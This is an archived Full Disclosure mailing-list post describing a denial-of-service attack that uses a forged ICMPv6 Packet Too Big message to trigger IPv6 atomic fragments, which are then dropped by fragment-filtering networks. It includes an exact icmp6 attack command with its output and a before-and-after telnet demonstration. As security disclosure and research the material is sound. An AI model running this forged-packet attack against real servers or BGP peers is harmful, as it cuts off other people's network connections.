Full Disclosure mailing list archives

By Date By Thread DoS attacks (ICMPv6-based) resulting from IPv6 EH drops From: Fernando Gont <fgont () si6networks com>

Date: Thu, 21 Aug 2014 21:03:03 -0300

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Folks, Ten days ago or so we published this I-D: <http://www.ietf.org/internet-drafts/draft-gont-v6ops-ipv6-ehs-in-real-world-00.txt> Section 5.2 of the I-D discusses a possible attack vector based on a combination of "forged" ICMPv6 PTB messages and IPv6 frag drops by operators, along with proposed countermeasures -- but let me offer a more informal and practical explanation: 1) It is known that filtering of packets containing IPv6 Extension Headers (including the Fragment Header) is widespread (see our I-D above) 2) Let us assume that Host A is communicating with Server B, and that some node filters fragments between Host A and Server B. 3) An attacker sends a spoofed ICMPv6 PTB to server B, with a "Next Hop MTU<1280), in the hopes of eliciting "atomic fragments" (see <http://tools.ietf.org/rfc/rfc6946.txt>) from now on. 4) Now server B starts sending IPv6 atomic fragments... And since they include a frag header (and in '2)' above we noted that frags are dropped on that path), these packets get dropped (i.e., DoS). "Demo" with the icmp6 tool (<http://www.si6networks.com/tools/ipv6toolkit>) -- (some addresses have been changed (anonymized), but it is trivial to pick a victim server...) "2001:db8:1:10:0:1991:8:25" is the server, and "2001:5c0:1000:a::840" is my own address): - ---- cut here ---- ***** First of all, I telnet to port 80 of the server, and everything works as expected **** fgont@satellite:~$ telnet 2001:db8:1:10:0:1991:8:25 80 Trying 2001:db8:1:10:0:1991:8:25... Connected to 2001:db8:1:10:0:1991:8:25. Escape character is '^]'. ^CConnection closed by foreign host. **** Now I send the forget ICMPv6 PTB **** fgont@satellite:~$ sudo icmp6 --icmp6-packet-too-big -d 2001:db8:1:10:0:1991:8:25 --peer-addr 2001:5c0:1000:a::840 --mtu 1000 -o 80 -v icmp6: Security assessment tool for attack vectors based on ICMPv6 error messages IPv6 Source Address: 2001:5c0:1000:a::840 (automatically selected) IPv6 Destination Address: 2001:db8:1:10:0:1991:8:25 IPv6 Hop Limit: 227 (randomized) ICMPv6 Packet Too Big (Type 2), Code 0 Next-Hop MTU: 1000 Payload Type: IPv6/TCP (default) Source Address: 2001:db8:1:10:0:1991:8:25 (automatically-selected) Destination Address: 2001:5c0:1000:a::840 Hop Limit: 237 (randomized) Source Port: 80 Destination Port: 38189 (randomized) SEQ Number: 734463213 (randomized) ACK Number: 866605720 (randomized) Flags: A (default) Window: 18944 (randomized) URG Pointer: 0 (default) Initial attack packet(s) sent successfully. ***** And now I try the same telnet command as above... but it fails, because the frags from the server to me are getting dropped somewhere **** fgont@satellite:~$ telnet 2001:db8:1:10:0:1991:8:25 80 Trying 2001:db8:1:10:0:1991:8:25... [timeout] - ---- cut here ---- Of course, in this particular case we just "shot ourselves". But one could do this to DoS connections between mailservers, etc. A nice question is: what if e.g.... 1) some BGP servers accept ICMPv6 PTB that claim an MTU < 1280, and react (as expected) by generating atomic fragments, *and*, 2) These same BGP servers deem fragmentation as "harmful", and hence drop such fragments you could essentially DoS traffic between them. ******************************************************************* JOIN US at the next edition of our "Hacking IPv6 Networks" training course in Leipzig, Germany. : February 2-3, 2015. More info available at: <https://www.it-defense.de/en/it-defense-2015/trainings/hacking-ipv6-networks/> ******************************************************************* - -- Fernando Gont SI6 Networks e-mail: fgont () si6networks com PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iQIcBAEBAgAGBQJT9oizAAoJEK4lDVUdTnSS9xIQAKaDyPAqxmtdzhKXOU1t3NqQ JD4XAfXWe6FnJCpYwCfj7SQWCxYUUx+i06DXrKQu/7NM4Qwi+f/D41MTzc8a27rF Mn9mKwhicgAJO8iOgxGfr5y/BfKg0RwyLhc7GSYZLT5AVeBwb02Zfs2NA1uQZ2ak AaFJJw2kjFZv6ynsPQ8L7MDoA0ixTqXrUV81iz9Wug5jkMkUk9Fm9RdbbZiHIWe5 57Y13+ZYWHDDPySf6UrJaXGn/S3JaUsy1jY+QPOppl+grsKBtNMuDcCM0TkMLq+b cAYM41bN3NtILSxd5R2EayecehQYa4qSBYOGf/JPE8j0LepH8Wp99LdKkldCZA0B Ja85ZlbOz/kA1SCymDTvnIVA47Wt6TFItG1s0OhTrms0qEfs6Mu1hz8zuARL5eOF PPtJbAnmWMAl4mKHbTJb2a7BCs5NtcBdknBPJWJhcoqfnRedSiOsUYpHjsmNMdQn wzdAaCDaSz3bfWbK37WPeusjA2+GfS/28jP4dOK3g3kPTy/Oml4kLKKPQ+wP8eO5 /i3aXjCMAJ8R5A7mnqVygz1IVLacMq8NclyFV/seTEnMNTulvnNUitBNFf+loYA/ 2+M5E+iAa/K1yeUcMoocZ+L3W+ml1yxgXE/50P0EOOHN7f/YK6Q+H2FHB45E0/wf NpYbne5sFlb9xmOEiD4e =YSDa -----END PGP SIGNATURE----- _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: DoS attacks (ICMPv6-based) resulting from IPv6 EH drops Fernando Gont (Aug 21)